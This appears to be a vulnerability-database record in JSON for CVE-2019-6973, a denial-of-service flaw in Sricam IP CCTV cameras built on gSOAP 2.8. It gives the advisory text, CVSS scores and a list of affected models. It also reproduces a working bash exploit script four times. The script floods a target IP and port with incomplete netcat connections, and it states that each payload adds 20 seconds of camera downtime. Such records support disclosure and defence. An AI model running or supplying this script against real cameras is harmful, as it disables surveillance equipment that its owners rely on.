ID CVE-2019-6973Type cveReporter cve@mitre.orgModified 2020-08-24T17:37:00
Description
Sricam IP CCTV cameras are vulnerable to denial of service via multiple incomplete HTTP requests because the web server (based on gSOAP 2.8.x) is configured for an iterative queueing approach (aka non-threaded operation) with a timeout of several seconds.
{"id": "CVE-2019-6973", "bulletinFamily": "NVD", "title": "CVE-2019-6973", "description": "Sricam IP CCTV cameras are vulnerable to denial of service via multiple incomplete HTTP requests because the web server (based on gSOAP 2.8.x) is configured for an iterative queueing approach (aka non-threaded operation) with a timeout of several seconds.", "published": "2019-03-21T16:01:00", "modified": "2020-08-24T17:37:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6973", "reporter": "cve@mitre.org", "references": ["https://github.com/bitfu/sricam-gsoap2.8-dos-exploit", "https://www.exploit-db.com/exploits/46261/", "http://packetstormsecurity.com/files/151377/Sricam-gSOAP-2.8-Denial-Of-Service.html"], "cvelist": ["CVE-2019-6973"], "type": "cve", "lastseen": "2020-10-03T13:38:59", "edition": 4, "viewCount": 37, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:151377"]}, {"type": "exploitdb", "idList": ["EDB-ID:46261"]}, {"type": "zdt", "idList": ["1337DAY-ID-32069"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B1192DA39B4D67FD7ABC8D40101C92BE"]}], "modified": "2020-10-03T13:38:59", "rev": 2}, "score": {"value": 2.6, "vector": "NONE", "modified": "2020-10-03T13:38:59", "rev": 2}, "vulnersScore": 2.6}, "cpe": ["cpe:/a:genivia:gsoap:2.8.0"], "affectedSoftware": [{"cpeName": "genivia:gsoap", "name": "genivia gsoap", "operator": "eq", "version": "2.8.0"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:genivia:gsoap:2.8.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "affectedConfiguration": [{"cpeName": "sricam:sp019", "name": "sricam sp019", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp023", "name": "sricam sp023", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp020", "name": "sricam sp020", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sh024", "name": "sricam sh024", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sh026", "name": "sricam sh026", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sh016", "name": "sricam sh016", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sh027", "name": "sricam sh027", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp007", "name": "sricam sp007", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp018", "name": "sricam sp018", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp008", "name": "sricam sp008", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp012", "name": "sricam sp012", "operator": "eq", "version": "-"}, {"cpeName": "sricam:nvs001", "name": "sricam nvs001", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp015", "name": "sricam sp015", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp017", "name": "sricam sp017", "operator": "eq", "version": "-"}, {"cpeName": "sricam:sp009", "name": "sricam sp009", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:genivia:gsoap:2.8.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:h:sricam:sp017:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:nvs001:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp009:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sh024:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sh026:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sh016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp012:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp019:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp008:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp018:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp023:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp007:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp020:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sp015:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:h:sricam:sh027:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSricam gSOAP 2.8 - Denial of Service", "edition": 1, "published": "2019-01-28T00:00:00", "title": "Sricam gSOAP 2.8 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6973"], "modified": "2019-01-28T00:00:00", "id": "EXPLOITPACK:B1192DA39B4D67FD7ABC8D40101C92BE", "href": "", "sourceData": "#!/bin/bash\n\n#######################################################################################\n#\n# Exploit Title: Sricam gSOAP 2.8 - Denial of Service\n# Date: 25/01/2019 \n# Vendor Status: Informed (24/10/2018)\n# CVE ID: CVE-2019-6973\n# Exploit Author: Andrew Watson\n# Contact: https://keybase.io/bitfu\n# Software Version: Sricam gSOAP 2.8\n# Vendor Homepage: http://www.sricam.com/\n# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000\n# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,\n# exploitable by sending multiple incomplete requests.\n# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit\n#\n# DISCLAIMER: This proof of concept is provided for educational purposes only!\n#\n#######################################################################################\n\n\nif [ -z \"$3\" ]; then\n\techo \"#############################################################################\"\n\techo -e \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\"\n\techo -e \"\\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>\"\n\techo \"[*] Example: $0 127.0.0.1 5000 10\"\n\techo -e \"\\n[!] Each DoS payload sent adds another 20 seconds downtime.\\n\"\n\texit 0\nfi\n\ntime=$(expr $3 \\* 20)\necho \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\"\necho -e \"\\n[+] Sending $3 DoS payloads...\"\necho \"[+] Expected downtime: $time seconds\"\nfor dos in $(seq 1 $3); do\nnetcat $1 $2 &\ndone\necho -e \"\\n[!] $dos DoS payloads sent to: $1:$2\"\necho", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2019-01-29T10:40:54", "description": "", "published": "2019-01-29T00:00:00", "type": "packetstorm", "title": "Sricam gSOAP 2.8 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6973"], "modified": "2019-01-29T00:00:00", "id": "PACKETSTORM:151377", "href": "https://packetstormsecurity.com/files/151377/Sricam-gSOAP-2.8-Denial-Of-Service.html", "sourceData": "`#!/bin/bash \n \n####################################################################################### \n# \n# Exploit Title: Sricam gSOAP 2.8 - Denial of Service \n# Date: 25/01/2019 \n# Vendor Status: Informed (24/10/2018) \n# CVE ID: CVE-2019-6973 \n# Exploit Author: Andrew Watson \n# Contact: https://keybase.io/bitfu \n# Software Version: Sricam gSOAP 2.8 \n# Vendor Homepage: http://www.sricam.com/ \n# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000 \n# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service, \n# exploitable by sending multiple incomplete requests. \n# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit \n# \n# DISCLAIMER: This proof of concept is provided for educational purposes only! \n# \n####################################################################################### \n \n \nif [ -z \"$3\" ]; then \necho \"#############################################################################\" \necho -e \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\" \necho -e \"\\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>\" \necho \"[*] Example: $0 127.0.0.1 5000 10\" \necho -e \"\\n[!] Each DoS payload sent adds another 20 seconds downtime.\\n\" \nexit 0 \nfi \n \ntime=$(expr $3 \\* 20) \necho \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\" \necho -e \"\\n[+] Sending $3 DoS payloads...\" \necho \"[+] Expected downtime: $time seconds\" \nfor dos in $(seq 1 $3); do \nnetcat $1 $2 & \ndone \necho -e \"\\n[!] $dos DoS payloads sent to: $1:$2\" \necho \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151377/sricamgsoap28-dos.txt"}], "zdt": [{"lastseen": "2019-03-06T00:24:02", "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "published": "2019-01-28T00:00:00", "title": "Sricam gSOAP 2.8 - Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6973"], "modified": "2019-01-28T00:00:00", "id": "1337DAY-ID-32069", "href": "https://0day.today/exploit/description/32069", "sourceData": "#!/bin/bash\r\n\r\n#######################################################################################\r\n#\r\n# Exploit Title: Sricam gSOAP 2.8 - Denial of Service\r\n# Date: 25/01/2019 \r\n# Vendor Status: Informed (24/10/2018)\r\n# CVE ID: CVE-2019-6973\r\n# Exploit Author: Andrew Watson\r\n# Contact: https://keybase.io/bitfu\r\n# Software Version: Sricam gSOAP 2.8\r\n# Vendor Homepage: http://www.sricam.com/\r\n# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000\r\n# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,\r\n# exploitable by sending multiple incomplete requests.\r\n# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit\r\n#\r\n# DISCLAIMER: This proof of concept is provided for educational purposes only!\r\n#\r\n#######################################################################################\r\n\r\n\r\nif [ -z \"$3\" ]; then\r\n\techo \"#############################################################################\"\r\n\techo -e \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\"\r\n\techo -e \"\\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>\"\r\n\techo \"[*] Example: $0 127.0.0.1 5000 10\"\r\n\techo -e \"\\n[!] Each DoS payload sent adds another 20 seconds downtime.\\n\"\r\n\texit 0\r\nfi\r\n\r\ntime=$(expr $3 \\* 20)\r\necho \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\"\r\necho -e \"\\n[+] Sending $3 DoS payloads...\"\r\necho \"[+] Expected downtime: $time seconds\"\r\nfor dos in $(seq 1 $3); do\r\nnetcat $1 $2 &\r\ndone\r\necho -e \"\\n[!] $dos DoS payloads sent to: $1:$2\"\r\necho\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32069"}], "exploitdb": [{"lastseen": "2019-01-28T18:59:22", "description": "", "published": "2019-01-28T00:00:00", "type": "exploitdb", "title": "Sricam gSOAP 2.8 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6973"], "modified": "2019-01-28T00:00:00", "id": "EDB-ID:46261", "href": "https://www.exploit-db.com/exploits/46261", "sourceData": "#!/bin/bash\r\n\r\n#######################################################################################\r\n#\r\n# Exploit Title: Sricam gSOAP 2.8 - Denial of Service\r\n# Date: 25/01/2019 \r\n# Vendor Status: Informed (24/10/2018)\r\n# CVE ID: CVE-2019-6973\r\n# Exploit Author: Andrew Watson\r\n# Contact: https://keybase.io/bitfu\r\n# Software Version: Sricam gSOAP 2.8\r\n# Vendor Homepage: http://www.sricam.com/\r\n# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000\r\n# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,\r\n# exploitable by sending multiple incomplete requests.\r\n# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit\r\n#\r\n# DISCLAIMER: This proof of concept is provided for educational purposes only!\r\n#\r\n#######################################################################################\r\n\r\n\r\nif [ -z \"$3\" ]; then\r\n\techo \"#############################################################################\"\r\n\techo -e \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\"\r\n\techo -e \"\\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>\"\r\n\techo \"[*] Example: $0 127.0.0.1 5000 10\"\r\n\techo -e \"\\n[!] Each DoS payload sent adds another 20 seconds downtime.\\n\"\r\n\texit 0\r\nfi\r\n\r\ntime=$(expr $3 \\* 20)\r\necho \"[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu\"\r\necho -e \"\\n[+] Sending $3 DoS payloads...\"\r\necho \"[+] Expected downtime: $time seconds\"\r\nfor dos in $(seq 1 $3); do\r\nnetcat $1 $2 &\r\ndone\r\necho -e \"\\n[!] $dos DoS payloads sent to: $1:$2\"\r\necho", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46261"}]}
